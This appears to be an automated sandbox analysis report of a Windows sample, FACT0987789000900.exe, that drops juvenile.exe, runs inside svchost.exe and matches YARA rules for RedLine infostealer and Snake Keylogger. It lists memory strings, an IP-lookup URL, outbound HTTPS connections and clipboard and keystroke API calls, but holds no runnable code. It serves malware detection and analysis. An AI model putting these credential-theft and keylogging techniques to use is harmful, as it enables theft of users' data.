Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 0000000B.00000002.2547860084.0000000005924000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 0000000B.00000002.2547860084.000000000591F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: svchost.exe, 00000008.00000002.2547584481.00000000056E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: svchost.exe, 00000008.00000002.2547584481.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.000000000580B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1898
Source: svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.orgch8
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8
Source: svchost.exe, 00000008.00000002.2547584481.0000000005715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49899 version: TLS 1.2

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004E6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

3_2_004E6B0C

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_004E6D07
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00926D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		6_2_00926D07

Source: C:\Users\user\Desktop\FACT0987789000900.exe

3_2_004E6B0C

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

3_2_004D2B37

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.juvenile.exe.3da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.juvenile.exe.3c60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: This is a third-party compiled AutoIt script.	3_2_00493D19
Source: FACT0987789000900.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd2bf540-0
Source: FACT0987789000900.exe, 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: LSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d3ae1f30-6
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: This is a third-party compiled AutoIt script.	6_2_008D3D19
Source: juvenile.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d29ce00d-c
Source: juvenile.exe, 00000006.00000002.1320568116.000000000097E000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_29c24b77-2
